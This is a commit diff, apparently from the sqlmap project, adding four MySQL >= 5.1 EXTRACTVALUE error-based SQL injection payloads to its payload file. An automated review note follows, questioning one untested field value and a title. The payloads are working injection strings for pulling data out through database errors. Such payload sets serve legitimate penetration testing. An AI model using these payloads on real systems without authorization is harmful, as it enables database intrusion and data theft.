

Commit eb42ced

committed
adding EXTRACTVALUE MySQL >= 5.1 error-based payload (http://www.notsosecure.com/folder2/2010/06/29/mysql-exploitation-with-error-messages/) - untested (no instance of that particular version was available for testing) and likely to need level/risk adjustment
1 parent b743301 commit eb42ced

1 file changed

Lines changed: 82 additions & 2 deletions

File tree

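--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1009,6 +1009,26 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>MySQL &gt;= 5.1 AND error-based - WHERE or HAVING clause</title>
+<stype>2</stype>
+<level>2</level>
+<risk>0</risk>
+<clause>1</clause>
+<where>1</where>
+<vector>AND EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+<request>
+<payload>AND EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+</request>
+<response>
+<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.1</dbms_version>
+</details>
+</test>
+
 <test>
 <title>MySQL &gt;= 4.1 AND error-based - WHERE or HAVING clause</title>
 <stype>2</stype>
@@ -1187,11 +1207,31 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>MySQL &gt;= 5.1 OR error-based - WHERE or HAVING clause</title>
+<stype>2</stype>
+<level>3</level>
+<risk>2</risk>
+<clause>1</clause>
+<where>1</where>
+<vector>OR EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+<request>
+<payload>OR EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+</request>
+<response>
+<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.1</dbms_version>
+</details>
+</test>
+
 <test>
 <title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause</title>
 <stype>2</stype>
 <level>2</level>
-<risk>0</risk>
+<risk>2</risk>
 <clause>1</clause>
 <where>2</where>
 <vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1])a GROUP BY x LIMIT 1)</vector>
@@ -1211,7 +1251,7 @@ Formats:
 <title>MySQL OR error-based - WHERE or HAVING clause</title>
 <stype>2</stype>
 <level>3</level>
-<risk>0</risk>
+<risk>2</risk>
 <clause>1</clause>
 <where>2</where>
 <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
@@ -1392,6 +1432,26 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>MySQL &gt;= 5.1 - Parameter replace</title>
+<stype>2</stype>
+<level>3</level>
+<risk>0</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>(EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
+<request>
+<payload>(EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>
+</request>
+<response>
+<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.1</dbms_version>
+</details>
+</test>
+
 <test>
 <title>PostgreSQL error-based - Parameter replace</title>
 <stype>2</stype>
@@ -1493,6 +1553,26 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses</title>
+<stype>2</stype>
+<level>3</level>
+<risk>0</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+<request>
+<payload>,EXTRACTVALUE([RANDNUM], CONCAT(0x5C, '[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+</request>
+<response>
+<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.1</dbms_version>
+</details>
+</test>
+
 <test>
 <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
 <stype>2</stype>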
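Review bot: The new OR entry in the second hunk sets `<where>1</where>` while the existing OR entry right below it (MySQL &gt;= 4.1 OR error-based, same `<clause>1</clause>`) uses `<where>2</where>`, and the commit message itself says these values are untested; if `where` means the same thing for both OR entries, the new one presumably wants `<where>2</where>` as well, which is worth confirming before it is relied on. The new parameter-replace entry in the fourth hunk is titled `MySQL &gt;= 5.1 - Parameter replace`, dropping the `error-based` qualifier that the adjacent `PostgreSQL error-based - Parameter replace` title and the other new titles carry; `<title>MySQL &gt;= 5.1 error-based - Parameter replace</title>` keeps the naming consistent and searchable. The enclosing test list and any schema comment describing the `level`/`risk`/`where` fields lie outside the shown hunks, so the field semantics are inferred here, not verified.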
